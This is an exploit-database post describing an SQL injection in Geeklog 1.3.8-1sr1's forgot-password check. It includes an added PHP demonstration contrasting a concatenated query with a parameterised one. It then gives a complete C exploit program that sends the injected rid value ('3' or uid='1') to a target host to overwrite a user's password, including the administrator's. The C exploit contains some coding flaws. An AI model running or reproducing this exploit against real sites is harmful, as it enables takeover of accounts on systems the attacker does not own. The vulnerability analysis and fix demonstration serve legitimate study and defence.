GeekLog POST Password Validation Exploit
Category: Vulnerability
Posted: 2005-04-09 by basher13
Views: 1139
Details

Update:
8:45 AM 4/9/2005

Subject:
GeekLog POST Password Validation Exploit

Vulnerable version:

Geeklog 1.3.8-1sr1

Description:

Geeklog is a weblog engine powered by PHP and MySQL. It lets you set up a fully
functioning dynamic website within minutes, and has many features to get you started.
As of Geeklog 1.3, these features are:

User-system, allowing members of the public to register for your site and submit stories.
Comment system, allowing users to comment on posts made to your site.
Block system, allowing you to put information anywhere on your site.
Plugin system that allows you to extend Geeklog, without having to code any new PHP.
Theme system that allows users to select what layout they want to view.
Excellent security model that allows you to give users control over certain aspects of the
site with no need to worry.
Site Statistics that show you the most popular areas of your site.
Link system that allows users to add links to the site.
Calendar System that lets you and your user add up-and-coming events.
Allow users to email stories to their friends.

Vulnerability:

The exploit below uses the "forgot password" feature introduced in Geeklog 1.3.8.
By constructing a certain kind of HTTP request, an attacker can change any user's
Geeklog password, including the administrator password.

This is because of an SQL injection problem. In users.php we have this kind of code
(around line 750):

if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
    // count rows whose uid and pwrequestid match the submitted values;
    // $uid is checked with is_numeric(), $reqid only with !empty()
    $valid = DB_count($_TABLES['users'], array('uid', 'pwrequestid'),
                      array($uid, $reqid));
    if ($valid == 1) {
        // generate an md5 hash for the new password and change it
    } else {
        // invalid request, display error message
    }
}

The database abstraction layer hides the actual SQL queries, so the problem is not
obvious yet, but if we log all SQL queries executed, we see that the above code produces
this SQL (with e.g. $uid=2 and $reqid=3):

    SELECT COUNT(*) FROM gl_users WHERE uid = '2' AND pwrequestid = '3'

The password is changed only if the count returned by this query is exactly one. The
only check done on $reqid is that it is not empty. It can contain anything, so by changing
$reqid to e.g. "3' or uid='1" the SQL server will get this query instead:

    SELECT COUNT(*) FROM gl_users
    WHERE uid = '2' AND pwrequestid = '3' or uid='1'

The pwrequestid = '3' condition is false unless the admin user really has forgotten the
password and is using this feature at the same time (very unlikely). However, because of
the "or uid='1'" part, the query still returns a count of one, because a user with uid=1
exists (the Anonymous user). So the $valid variable in the above code is set to one and
the password is changed.

This of course has nothing to do with displaying error messages. The exploit does not
produce any error message, because the SQL above is syntactically valid.
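The check described above, rebuilt as an added example (this is not Geeklog's code) so that the difference between the concatenated query and a parameterised one can be observed directly. It assumes PHP with the pdo_sqlite extension; the gl_users table with its uid and pwrequestid columns and the injected value "3' or uid='1" come from the advisory, while the two sample rows and the function names countVulnerable and countHardened are constructed for this example:

```php
<?php
// Added example, not Geeklog's code: replays the "forgot password" request
// check from the advisory against an in-memory SQLite table, first with the
// values interpolated into the SQL text (vulnerable) and then with a
// prepared statement (hardened). Assumes the pdo_sqlite extension.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE gl_users (uid INTEGER PRIMARY KEY, username TEXT, pwrequestid TEXT)');

// Constructed sample rows: uid 1 is the Anonymous user the advisory mentions,
// uid 2 is the account whose password the request tries to set. Neither has
// an outstanding password-reset request, so a correct check must return 0.
$pdo->exec("INSERT INTO gl_users VALUES (1, 'Anonymous', '')");
$pdo->exec("INSERT INTO gl_users VALUES (2, 'Admin', '')");

// Vulnerable check, as the advisory describes: both values land in the WHERE
// clause as text, so $reqid can close the quote and append its own OR branch.
function countVulnerable(PDO $pdo, string $uid, string $reqid): int
{
    $sql = "SELECT COUNT(*) FROM gl_users WHERE uid = '$uid' AND pwrequestid = '$reqid'";
    return (int) $pdo->query($sql)->fetchColumn();
}

// Hardened check (hypothetical, not the vendor's patch): the uid must be a
// digit string, and both values are bound as parameters, so whatever $reqid
// contains is compared literally against the column and never parsed as SQL.
function countHardened(PDO $pdo, string $uid, string $reqid): int
{
    if (!ctype_digit($uid) || $reqid === '') {
        return 0;   // malformed request: treat as invalid without touching the database
    }
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM gl_users WHERE uid = ? AND pwrequestid = ?');
    $stmt->execute([(int) $uid, $reqid]);
    return (int) $stmt->fetchColumn();
}

$uid   = '2';
$reqid = "3' or uid='1";   // the injected request id from the advisory

$v = countVulnerable($pdo, $uid, $reqid);   // 1: the OR branch matches the Anonymous row
$h = countHardened($pdo, $uid, $reqid);     // 0: no row has that literal pwrequestid

printf("vulnerable: count=%d -> %s\n", $v, $v === 1 ? 'password would be changed' : 'request rejected');
printf("hardened:   count=%d -> %s\n", $h, $h === 1 ? 'password would be changed' : 'request rejected');
```

Running it prints a count of 1 for the concatenated query and 0 for the prepared one. The point to take from the advisory is that the is_numeric() check on $uid alone is not enough: every value that reaches the query text needs the same treatment, and binding parameters removes the question entirely.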

Exploit:

/*
GeekLog POST Password Validation Exploit
----------------------------------------
INFGP - Hacking&security Research

[+]Connecting...[OK]
[+]Building string code..[OK]
[+]Send evil request...[DONE]
[*]Set http://infamous-group for administration status..[SUCCESS]


Greet: Jouko Pynnonen (has discovered bug),MurDoK
info : 98.to/infamous

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;

/* Raw HTTP request header. The %s placeholders are never substituted anywhere
   in the program (the commented-out line below shows the sprintf arguments the
   author apparently intended); the POST body is appended to this buffer in main(). */
char slutcode[1000] =
"POST %s /users.php HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Referer: http://%s/%s \r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Host: 192.168.0.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"
"Content-Length: 62\r\n"
"\r\n";
//"mode=setnewpwd&passwd=123win&uid=2&rid=3'+or+uid='1&"",argv[2],argv[1],argv[2];


int main(int argc, char *argv[]) {

    // system("clear");
    printf("GeekLog POST Password Validation Exploit\n");
    printf("-----------------------------\n");
    printf("INFGP-Hacking&Security Research\n\n");

    if(argc<4) {
        printf("Usage: %s [target] [path] [new_pass]\n\n", argv[0]);
        exit(1);
    }

    fd = socket(AF_INET, SOCK_STREAM, 0);

    /* resolve the target; note that the result is used without a NULL check */
    he = gethostbyname(argv[1]);
    memset((char *) &sock, 0, sizeof(sock));

    sock.sin_family = AF_INET;
    sock.sin_port=htons(80);
    sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);

    printf("[+]Connecting... ");

    if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
        printf("[-]Connect to host FAILED\n");
        return 0;
    }
    printf("[OK]\n");
    printf("[+]Building string code..");
    /* append the form body: the new password from argv[3] and the injected rid
       value described in the advisory */
    strcat(slutcode, "mode=setnewpwd&passwd=");
    strcat(slutcode, argv[3]);
    strcat(slutcode, "&uid=2&rid=3'+or+uid='1&");
    printf("[OK]\n");
    printf("[+]Send evil request...");
    write(fd, slutcode, strlen(slutcode));
    printf("[DONE]\n");
    printf("[*]Set http://%s for administration status..[SUCCESS]\n", argv[1]);

    close(fd);

    return 1;
}

Solution:
The author has released a fixed version.

Vendor URL:
http://www.geeklog.net